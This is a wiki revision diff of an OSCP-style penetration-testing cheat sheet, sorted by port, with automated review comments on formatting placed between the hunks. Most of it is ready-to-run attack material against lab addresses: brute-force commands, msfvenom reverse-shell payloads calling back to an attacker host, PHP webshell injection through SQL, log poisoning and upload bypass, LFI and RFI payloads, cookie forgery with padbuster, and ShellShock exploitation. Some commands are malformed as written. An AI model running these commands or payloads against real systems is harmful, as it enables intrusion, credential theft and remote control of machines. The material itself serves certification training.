oscp_survival_guide

Differences

This page shows the differences between the selected revision and the current version of the page.


oscp_survival_guide [2021/02/06 20:56]
M0N5T3R
oscp_survival_guide [2021/02/06 22:47] (current version)
M0N5T3R
Line 1: Line 1:
-f 
 ---- ----
  
Line 2722: Line 2721:
  
          
-====== EDIT: Useful and fast exploit : ======+====== EDIT: Useful and fast exploit - Cheat sheet : ====== 
 + 
 +**Port 22 - SSH**  
 +<code> 
 +hydra -l $USERNAME -P /usr/share/wordlists/wfuzz/others/common_pass.txt ssh://$RHOST 
 +</code> 
 + 
 + 
 +**Port 25 - SMTP **  
 +<code> 
 +nc 10.11.1.217 25 
 +[...] 
 +VRFY root 
 +252 2.0.0 root 
 +</code> 
 + 
 + 
 + 
 +**Port 53 - DNS**  
 +<code> 
 +dig axfr @$RHOST DOMAIN.COM 
 +dnsrecon -d DOMAIN.COM 
 +</code> 
  
  
 **Port 69 - UDP - TFTP** **Port 69 - UDP - TFTP**
-#nmap -p69 --script=tftp-enum.nse 10.11.1.111+<code>#nmap -p69 --script=tftp-enum.nse 10.11.1.111</code>
  
 #exploit AT-TFTP 1.9 : https://github.com/brianwrf/cve-2006-6184 #exploit AT-TFTP 1.9 : https://github.com/brianwrf/cve-2006-6184
-perl -e 'print ""\x81\xec\xac\x0d\x00\x00""' > stackadj+<code>perl -e 'print ""\x81\xec\xac\x0d\x00\x00""' > stackadj
 msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.x LPORT=443 R > payload msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.x LPORT=443 R > payload
 cat stackadj payload > shellcode cat stackadj payload > shellcode
 cat shellcode | msfvenom -e x86/shikata_ga_nai -b ""\x00"" -a x86 --platform win -f python cat shellcode | msfvenom -e x86/shikata_ga_nai -b ""\x00"" -a x86 --platform win -f python
 +</code>
  
 **Port 88 - Kerberos**  **Port 88 - Kerberos** 
 +<code>
 +- MS14-068
 +- GetUserSPNs
 +GET USERS:
 nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP
 use auxiliary/gather/kerberos_enumusers use auxiliary/gather/kerberos_enumusers
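Review bot: the Port 88 `<code>` block opened at `+<code>` starts with note lines (`- MS14-068`, `- GetUserSPNs`, `GET USERS:`) rather than commands; elsewhere in this revision such notes sit outside the code tag as bold text, so move them above the `<code>`. Two smaller points: `perl -e 'print ""\x81\xec\xac\x0d\x00\x00""'` and `-b ""\x00""` keep doubled double-quotes that look like a CSV-export artifact (the same pattern recurs in the `INTO OUTFILE` and `pattern_offset.rb` lines further down, so one cleanup pass covers all of them), and the new SSH line uses `$USERNAME`/`$RHOST` placeholders while the neighbouring blocks hard-code `10.11.1.x` addresses; pick one convention. The SMTP snippet (`VRFY root` / `252 2.0.0 root`) is a captured session, not a command, and is worth labelling as output: a `252` reply to `VRFY` means the server confirms account existence, which is a setting mail administrators normally disable.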
Line 2742: Line 2768:
 python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt
 https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/ https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
 +nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP
 +use auxiliary/gather/kerberos_enumusers
 +https://www.tarlogic.com/blog/como-funciona-kerberos/
 +https://www.tarlogic.com/blog/como-atacar-kerberos/
 +python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt
 +https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
 +</code>
 +
  
 **Port 111 - Rpcbind** **Port 111 - Rpcbind**
 +<code>
 +nmap -sV -p 111 --script=rpcinfo $RHOST
 +nmap -p 111 --script nfs* $RHOST
 +mount -t nfs -o vers=3 $RHOST:/SHARENAME /mnt
 +groupadd --gid 1337 pwn
 +useradd --uid 1337 -g pwn pwn
 +
 +
 +
 rpcinfo -p 10.11.1.111 rpcinfo -p 10.11.1.111
 rpcclient -U "" 10.11.1.111 rpcclient -U "" 10.11.1.111
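Review bot: the lines from `+nmap -p 88 --script=krb5-enum-users ...` through `+https://blog.stealthbits.com/...` re-add commands and links that are already present as unchanged context immediately above (`nmap -p 88 ...`, `use auxiliary/gather/kerberos_enumusers`, the kerbrute line, the stealthbits URL), so the Port 88 block now lists each of them twice; drop the added copies and keep only the two tarlogic links, which are the genuinely new lines. The Rpcbind block also picks up NFS material (`mount -t nfs -o vers=3 $RHOST:/SHARENAME /mnt`, `groupadd --gid 1337 pwn`, `useradd --uid 1337 -g pwn pwn`) followed by three empty `+` lines; that belongs with the existing Port 2049 - NFS section, so rpcbind stays about `rpcinfo`/`rpcclient`.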
Line 2752: Line 2795:
  netshareenum  netshareenum
  netshareenumall  netshareenumall
 +</code>
  
  
 **Port 135 - MSRPC** **Port 135 - MSRPC**
-nmap 10.11.1.111 --script=msrpc-enum+<code>nmap 10.11.1.111 --script=msrpc-enum
 msf > use exploit/windows/dcerpc/ms03_026_dcom msf > use exploit/windows/dcerpc/ms03_026_dcom
 +</code>
  
 +
 +**Port 161 -  SNMP**
 +<code>snmp-check $RHOST
 +onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $RHOST
 +snmpwalk -v1 -c public $RHOST
 +nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $IP
 +nmap -sU -p 161 --script /usr/share/nmap/scripts/snmp-win32-users.nse $IP
 +</code>
  
 **Port 139/445 - SMB** **Port 139/445 - SMB**
-# Get Version+<code># Get Version
 smbver.sh 10.11.1.111 smbver.sh 10.11.1.111
 Msfconsole;use scanner/smb/smb_version Msfconsole;use scanner/smb/smb_version
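Review bot: the new `**Port 161 -  SNMP**` block duplicates the existing `**Port 161/162 UDP - SNMP**` heading further down (the `nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes` line appears in both); merge them under one heading and fix the double space. Within the new block the placeholder switches from `$RHOST` (`snmp-check`, `onesixtyone`, `snmpwalk`) to `$IP` (the two nmap lines); use one variable. Worth a comment in the block: `onesixtyone -c .../common-snmp-community-strings.txt` and `snmpwalk -v1 -c public` only return data where SNMPv1/v2c with default community strings is still enabled, which is the misconfiguration these lines are really testing for.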
Line 2866: Line 2918:
 listening on [any] 443 ... listening on [any] 443 ...
 C:\WINDOWS\system32> C:\WINDOWS\system32>
 +</code>
  
 **Port 161/162 UDP - SNMP** **Port 161/162 UDP - SNMP**
-nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111 +<code>nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111 
-snmp-check 10.11.1.111 -c public|private|community+snmp-check 10.11.1.111 -c public|private|community</code>
  
  
-**LDAP - 389,636** +**Port 389,636 - LDAP ** 
-ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"+<code>ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"
 ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password' ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password'
 ldapdomaindump 10.11.1.111 -u 'DOMAIN\user' -p 'hash-password' ldapdomaindump 10.11.1.111 -u 'DOMAIN\user' -p 'hash-password'
 patator ldap_login host=10.10.1.111 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.' patator ldap_login host=10.10.1.111 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.'
 +</code>
  
- +**Port 443 - HTTPS** 
-**HTTPS - 443** +<code>Read the actual SSL CERT to:
-Read the actual SSL CERT to:+
 find out potential correct vhost to GET find out potential correct vhost to GET
 is the clock skewed is the clock skewed
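Review bot: the `**Port 443 - HTTPS**` `<code>` block opens on prose (`Read the actual SSL CERT to:`, `find out potential correct vhost to GET`, `is the clock skewed`); these are checklist items, not commands, and should sit as text above the tag, as the other sections do. The renamed heading `**Port 389,636 - LDAP **` has a space before the closing `**`, unlike the other renamed headings in this revision.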
Line 2889: Line 2941:
 nmap -sV --script=ssl-heartbleed 10.1.10.111 nmap -sV --script=ssl-heartbleed 10.1.10.111
 mod_ssl,OpenSSL version Openfuck mod_ssl,OpenSSL version Openfuck
 +</code>
  
-**500 - ISAKMP IKE** +**Port  500 - ISAKMP IKE** 
-ike-scan 10.11.1.111+<code>ike-scan 10.11.1.111</code>
  
-**513 - Rlogin** +**Port 513 - Rlogin** 
-apt install rsh-client+<code>apt install rsh-client
 rlogin -l root 10.11.1.111 rlogin -l root 10.11.1.111
 +</code>
  
 +**Port 541 - FortiNet SSLVPN**
 +<code>https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
 +</code>
  
-**541 - FortiNet SSLVPN** +**Port 1433 - MSSQL** 
-https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/ +<code>nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111
- +
- +
-**1433 - MSSQL** +
-nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111+
 use auxiliary/scanner/mssql/mssql_ping use auxiliary/scanner/mssql/mssql_ping
 use auxiliary/scanner/mssql/mssql_login use auxiliary/scanner/mssql/mssql_login
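Review bot: `nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111` scans UDP 1433, but SQL Server listens on TCP 1433 (the UDP side is the browser service on 1434), so the scan type and the port do not match; check which was intended. Style points: `**Port  500 - ISAKMP IKE**` has a double space, and the `Port 541 - FortiNet SSLVPN` block wraps a bare URL in `<code>`; a link is text, not a command.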
Line 2909: Line 2962:
 sqsh -S 10.11.1.111 -U sa sqsh -S 10.11.1.111 -U sa
  xp_cmdshell 'date'  xp_cmdshell 'date'
 +</code>
  
 **Port 1521 - Oracle** **Port 1521 - Oracle**
-oscanner -s 10.11.1.111 -P 1521+<code>oscanner -s 10.11.1.111 -P 1521
 tnscmd10g version -h 10.11.1.111 tnscmd10g version -h 10.11.1.111
 tnscmd10g status -h 10.11.1.111 tnscmd10g status -h 10.11.1.111
Line 2928: Line 2981:
 and run it: and run it:
 ./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe ./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe
 +</code>
  
 **Port 2049 - NFS** **Port 2049 - NFS**
-showmount -e 10.11.1.111+<code>showmount -e 10.11.1.111
 If you find anything you can mount it like this: If you find anything you can mount it like this:
 mount 10.11.1.111:/ /tmp/NFS mount 10.11.1.111:/ /tmp/NFS
 mount -t 10.11.1.111:/ /tmp/NFS mount -t 10.11.1.111:/ /tmp/NFS
 +</code>
 +
  
 **Port 2100 - Oracle XML DB** **Port 2100 - Oracle XML DB**
-Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm+<code>Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm 
 +</code> 
  
 **Port 3306 - MySQL** **Port 3306 - MySQL**
-nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306+<code>nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306
 mysql --host=10.11.1.111 -u root -p mysql --host=10.11.1.111 -u root -p
 MYSQL UDF  MYSQL UDF 
 https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/ https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
 +</code>
 +
  
 **Port 3389 - RDP** **Port 3389 - RDP**
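Review bot: `mount -t 10.11.1.111:/ /tmp/NFS` is not a valid invocation: `-t` takes a filesystem type, so as written the export path is consumed as the type and no source remains; the line above it (`mount 10.11.1.111:/ /tmp/NFS`) already shows the working form, and the Rpcbind block added earlier uses `-t nfs -o vers=3`, so the NFS material now lives in two places and one copy is redundant. Same prose-in-code pattern here as elsewhere: `If you find anything you can mount it like this:`, `Default passwords https://docs.oracle.com/...` and `MYSQL UDF` plus its URL are notes, not commands, and should sit outside the `<code>` tags.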
Line 2953: Line 3013:
  
 **VNC - 5900** **VNC - 5900**
-nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111+<code>nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111 
 +</code>
  
-**WinRM - 5985** + 
-https://github.com/Hackplayers/evil-winrm+**RealVNC** 
 +<code>RealVNC : https://www.exploit-db.com/exploits/36932 
 +Edit, BIND_ADDR into mine and BIND_PORT into 4444 
 +root@kali:~/PWK$python RealVNC-exploit-36932.py 
 +[] Please input an IP address to pwn: 10.11.1.x 
 +[] Hello From Server: RFB 003.008 
 +Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del 
 +</code> 
 + 
 + 
 +**Port 5985 - WinRM ** 
 +<code>https://github.com/Hackplayers/evil-winrm
 gem install evil-winrm gem install evil-winrm
 evil-winrm -i 10.11.1.111 -u Administrator -p 'password1' evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
 evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder
 +</code>
  
  
-**Redis - 6379** + 
-https://github.com/Avinash-acid/Redis-Server-Exploit+**Port 6379 - Redis ** 
 +<code>https://github.com/Avinash-acid/Redis-Server-Exploit
 python redis.py 10.10.10.160 redis python redis.py 10.10.10.160 redis
 +</code>
  
-**MsDeploy - 8172** + 
-Microsoft IIS Deploy port+**Port 8172 - MsDeploy ** 
 +<code>Microsoft IIS Deploy port
 IP:8172/msdeploy.axd IP:8172/msdeploy.axd
 +</code>
 +
  
 **Port 8080- Groovy RCE** **Port 8080- Groovy RCE**
-def process = "cmd /c whoami".execute();println "${process.text}";+<code>def process = "cmd /c whoami".execute();println "${process.text}";
 #Groovy RevShell #Groovy RevShell
 String host="localhost"; String host="localhost";
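Review bot: heading style is now inconsistent: most sections were renamed to `**Port N - Name**`, but `**VNC - 5900**` keeps the old order and `**RealVNC**` has no port, while `**Port 5985 - WinRM **`, `**Port 6379 - Redis **` and `**Port 8172 - MsDeploy **` carry a stray space before the closing `**`. In the moved RealVNC block, `[] Please input an IP address to pwn` and `[] Hello From Server` appear to have lost a character inside the brackets (probably `[*]` consumed by wiki markup), and `vmware’s` uses a curly apostrophe; inside `<code>` these should be plain ASCII. `Microsoft IIS Deploy port` and `https://github.com/Hackplayers/evil-winrm` are descriptive text and a link placed inside code tags.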
Line 2977: Line 3055:
 String cmd="cmd.exe"; String cmd="cmd.exe";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);Inpu Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);Inpu
 +</code>
  
  
  
 +**Port 8080- SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)**
 +<code>https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh
 +</code>
  
-SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692) 
-https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh 
  
-RealVNC 
-RealVNC : https://www.exploit-db.com/exploits/36932 
-Edit, BIND_ADDR into mine and BIND_PORT into 4444 
-root@kali:~/PWK$python RealVNC-exploit-36932.py 
-[] Please input an IP address to pwn: 10.11.1.x 
-[] Hello From Server: RFB 003.008 
-Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del 
  
 +**XAMPP**
 +<code>XAMPP cred(wampp/xampp)
 +</code>    
  
-XAMPP +**ColdFusion (Vulnerable)** 
-XAMPP cred(wampp/xampp) +<code>Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
-     +
- +
-ColdFusion (Vulnerable) +
-Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl+
 LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
 (either – neo-security.xml and password.properties) (either – neo-security.xml and password.properties)
 ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
 exploit/windows/http/coldfusion_fckeditor – only for 8.0.1 exploit/windows/http/coldfusion_fckeditor – only for 8.0.1
 +</code>
  
-Webdav+ 
 +**Webdav** 
 +<code>
 WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.x WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.x
 auxiliary : webdav_test auxiliary : webdav_test
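Review bot: the Groovy block ends on a truncated line (`...Socket s=new Socket(host,port);Inpu`), so the snippet is incomplete as recorded and the `</code>` added after it closes a cut-off block; either restore the full line or mark it as truncated. The new `**Port 8080- SquirrelMail ...**` heading reuses the `Port 8080-` prefix of the Groovy heading, but SquirrelMail is a webmail application with no fixed port, so the label is misleading. In the ColdFusion block `passowrd` is a typo, and ellipsis characters (`…`) and en-dashes (`–`) have replaced ASCII punctuation in the `locale=` URL and the two `–` notes, so those lines no longer read as typed; the XAMPP block is a one-line credential note wrapped in a code tag.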
Line 3011: Line 3086:
 1 dav:> put shells.txt 1 dav:> put shells.txt
 2 dav:> copy shells.txt shells.asp;.txt 2 dav:> copy shells.txt shells.asp;.txt
 +</code>
 +
  
-PHPAdmin  +**PHPAdmin**  
-http://.../phpmyadmin+<code>http://.../phpmyadmin
 db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank) db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank)
 You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"
 +</code>
 +
  
-Tomcat  +**Tomcat**  
-Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.x:8080/manager/html+<code>Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.x:8080/manager/html
 You can upload reverse shell on manager consor ; msfvenom jsp or war file You can upload reverse shell on manager consor ; msfvenom jsp or war file
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.x LPORT=443 -f war > shell.war msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.x LPORT=443 -f war > shell.war
 jar -xvf shell.war jar -xvf shell.war
 +</code>
  
- +**Windows IIS**  
-Windows IIS  +<code>Getting Windows 0S and version details through Nikto / Nmap Scanning.
-Getting Windows 0S and version details through Nikto / Nmap Scanning.+
 auxiliary/admin/http/iis_auth_bypass auxiliary/admin/http/iis_auth_bypass
 +</code>
  
-mysql+**mysql** 
 +<code>
 nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306 nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
 MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac
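Review bot: `**PHPAdmin**` should read phpMyAdmin, which is what the `/phpmyadmin` path and `/etc/phpmyadmin/config-db.php` refer to. Typos in the Tomcat block: `browsereg.` (browser, e.g.) and `manager consor` (console); in the IIS block `Windows 0S` has a zero for the letter O. The `sh hydra ...` and `sh mysql ...` prefixes look like a copied code-fence language tag rather than part of the command, and `–script=` in the mysql nmap line uses an en-dash instead of `--`, so that line fails as typed. This `**mysql**` section also overlaps `**Port 3306 - MySQL**` above; the two nmap script lists differ only slightly and can be merged.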
Line 3036: Line 3117:
 OPEN A PHP SHELL : OPEN A PHP SHELL :
 ' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE  ' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE 
 +</code>
  
  
  
- +**ShellShock** 
- +<code>
- +
- +
- +
- +
-MSRPC - PORT 135 +
-nmap 10.11.1.111 --script=msrpc-enum +
-msf use exploit/windows/dcerpc/ms03_026_dcom +
- +
- +
-ShellShock+
 nikto scan results; shows shellshock on /cgi-bin; use 34900.py nikto scan results; shows shellshock on /cgi-bin; use 34900.py
 root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234 root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234
 [!] Started reverse shell handler [!] Started reverse shell handler
 [-] Trying exploit on : /cgi-bin/status" [-] Trying exploit on : /cgi-bin/status"
 +</code>
 +
  
-Squid  +**Squid**  
-proxy scanner/http/squid_pivot_scanning+<code>proxy scanner/http/squid_pivot_scanning
 RHOST : Target RHOST : Target
 RANGE : Target RANGE : Target
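Review bot: removing the duplicated `MSRPC - PORT 135` block is the right call, and the same treatment is owed to the duplicated SNMP and Kerberos material elsewhere in this revision. In the ShellShock block, `nikto scan results; shows shellshock on /cgi-bin; use 34900.py` is commentary and the following three lines are a terminal transcript with a stray trailing `"` on `/cgi-bin/status"`; the mysql block's `' union select ""<?php ..."" INTO OUTFILE` line ends without its target and keeps the doubled-quote artifact, and the Squid line `nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128"` has the same stray quote.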
Line 3066: Line 3140:
 if the target uses squid proxy via 3128 port, use nikto with that proxy setting  if the target uses squid proxy via 3128 port, use nikto with that proxy setting 
 nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128" nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128"
 +</code>
 +
 +
 +**LFI**
 +<code>
 +fimap -u "http://10.11.1.111/example.php?test="
 +
 +# Ordered output
 +curl -s http://10.11.1.111/gallery.php?page=/etc/passwd
 +/root/Tools/Kadimus/kadimus -u http://10.11.1.111/example.php?page=
 +
 +http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
 +http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00 or ?
 +?page=php://filter/convert.base64-encode/resource=../config.php
 +../../../../../boot.ini
 +
 +amap -d 10.11.1.111 8000
 +
 +# LFI Windows
 +http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
 +
 +# Contaminating log files
 +root@kali:~# nc -v 10.11.1.111 80
 +10.11.1.111: inverse host lookup failed: Unknown host
 +(UNKNOWN) [10.11.1.111] 80 (http) open
 + <?php echo shell_exec($_GET['cmd']);?> 
 + 
 +http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig
 +</code>
 +
 +
  
-RFI(Remote File Inclusion)  +**RFI(Remote File Inclusion)**  
-browse.php?file=http://10.11.0.x/index.html+<code>browse.php?file=http://10.11.0.x/index.html
 browse.php?file=ftp://10.11.0.x/index.html browse.php?file=ftp://10.11.0.x/index.html
 browse.php?expect://ls browse.php?expect://ls
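Review bot: the new `**LFI**` block mixes several unrelated items: `# Ordered output` labels a `curl` line and a Kadimus line that have nothing to do with output ordering; `http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00 or ?` is a remote-include example that belongs under the `**RFI(Remote File Inclusion)**` heading that follows, and it ends in an unfinished `or ?`; `amap -d 10.11.1.111 8000` is a service fingerprint with no relation to file inclusion. The log-contamination part embeds a netcat transcript (`10.11.1.111: inverse host lookup failed: Unknown host`, `(UNKNOWN) [10.11.1.111] 80 (http) open`) alongside the commands, which should be separated or marked as output, and the `&& base64 -d savefile.php` tail is shell appended to a URL; make it two lines.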
Line 3074: Line 3179:
 Uploading malicious .php file on database  Uploading malicious .php file on database 
 http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html
 +</code>
  
  
-Kerberos  +**Cookies error padding:** 
-- MS14-068 +&lt;code&gt
-- GetUserSPNs +# Get cookie structure 
-GET USERS+padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" 
-nmap -p 88 --script=krb5-enum-users --script-args=&quot;krb5-enum-users.realm='DOMAIN.LOCAL'&quotIP +# Get cookie for other user (impersonation) 
-use auxiliary/gather/kerberos_enumusers +padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorme' 
-https://www.tarlogic.com/blog/como-funciona-kerberos/ +</code>
-https://www.tarlogic.com/blog/como-atacar-kerberos/ +
-python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt +
-https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/+
  
  
  
 +**Bypass image upload restrictions**
 +<code>
 +- Change extension: .pHp3 or pHp3.jpg
 +- Modify mimetype: Content-type: image/jpeg
 +- Bypass getimagesize(): exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
 +- Add gif header: GIF89a;
 +- All at the same time.
 +</code>
  
-******************* +**Password brute force - last resort** 
-* note            *  +<code> 
-*******************+cewl 
 +hash-identifier 
 +john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt 
 +medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10 
 +ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111 
 +crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1 
 +hydra -l root -P password-file.txt 10.11.1.111 ssh 
 +hydra -P password-file.txt -v 10.11.1.111 snmp 
 +hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V 
 +hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V 
 +hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V 
 + 
 +# SIMPLE LOGIN GET 
 +hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V 
 + 
 +# GET FORM with HTTPS 
 +hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!" 
 + 
 +# SIMPLE LOGIN POST 
 +hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I 
 + 
 +# API REST LOGIN POST 
 +hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64 
 + 
 +# Dictionary creation 
 +https://github.com/LandGrey/pydictor 
 +https://github.com/Mebus/cupp 
 +git clone https://github.com/sc0tfree/mentalist.git 
 +</code> 
 + 
 + 
 +**BOF** 
 +<code> 
 +# BASIC GUIDE 
 +1. Send "A"*1024 
 +2. Replace "A" with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l LENGTH 
 +3. When crash "!mona findmsp" (E10.11.1.111 offset) or ""/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q TEXT" or "!mona pattern_offset eip" 
 +4. Confirm the location with "B" and "C" 
 +5. Check for badchars instead CCCC (ESP): 
